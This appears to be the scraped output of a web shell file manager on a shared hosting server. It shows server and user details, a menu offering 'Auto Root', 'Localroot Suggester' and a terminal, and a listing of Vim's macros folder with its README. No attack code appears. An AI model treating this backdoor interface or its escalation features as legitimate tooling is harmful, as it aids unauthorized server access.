Linux premium71.web-hosting.com 4.18.0-513.11.1.lve.el8.x86_64 #1 SMP Thu Jan 18 16:21:02 UTC 2024 x86_64
LiteSpeed
Server IP : 198.187.29.8 & Your IP : 216.73.216.155
Domains :
Cant Read [ /etc/named.conf ]
User : cleahvkv
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
usr /
share /
vim /
vim80 /
macros /
Delete
Unzip
Name
Size
Permission
Date
Action
hanoi
[ DIR ]
drwxr-xr-x
2024-03-05 23:19
life
[ DIR ]
drwxr-xr-x
2024-03-05 23:19
maze
[ DIR ]
drwxr-xr-x
2024-03-05 23:19
urm
[ DIR ]
drwxr-xr-x
2024-03-05 23:19
README.txt
1.09
KB
-rw-r--r--
2022-08-02 16:56
editexisting.vim
124
B
-rw-r--r--
2022-08-02 16:56
justify.vim
109
B
-rw-r--r--
2022-08-02 16:56
less.bat
288
B
-rw-r--r--
2022-08-02 16:56
less.sh
588
B
-rwxr-xr-x
2022-08-02 16:56
less.vim
5.44
KB
-rw-r--r--
2022-08-02 16:56
matchit.vim
124
B
-rw-r--r--
2022-08-02 16:56
shellmenu.vim
115
B
-rw-r--r--
2022-08-02 16:56
swapmous.vim
114
B
-rw-r--r--
2022-08-02 16:56
Save
Rename
The macros in the maze, hanoi and urm directories can be used to test Vim for vi compatibility. They have been written for vi to show its unlimited possibilities. The life macros can be used for performance comparisons. hanoi Macros that solve the tower of hanoi problem. life Macros that run Conway's game of life. maze Macros that solve a maze (amazing!). urm Macros that simulate a simple computer: "Universal Register Machine" The other files contain some handy utilities. They also serve as examples for how to use Vi and Vim functionality. less.sh + less.vim make Vim work like less (or more) The following have been moved to an optional package. Add the command to your vimrc file to use the package: packadd! dvorak " Dvorak keyboard support; adds mappings packadd! editexisting " when editing a file that is already edited with " another Vim instance, go to that Vim instance packadd! justify " justifying text. packadd! matchit " makes the % command work better packadd! shellmenu " menus for editing shell scripts in the GUI version packadd! swapmouse " swap left and right mouse buttons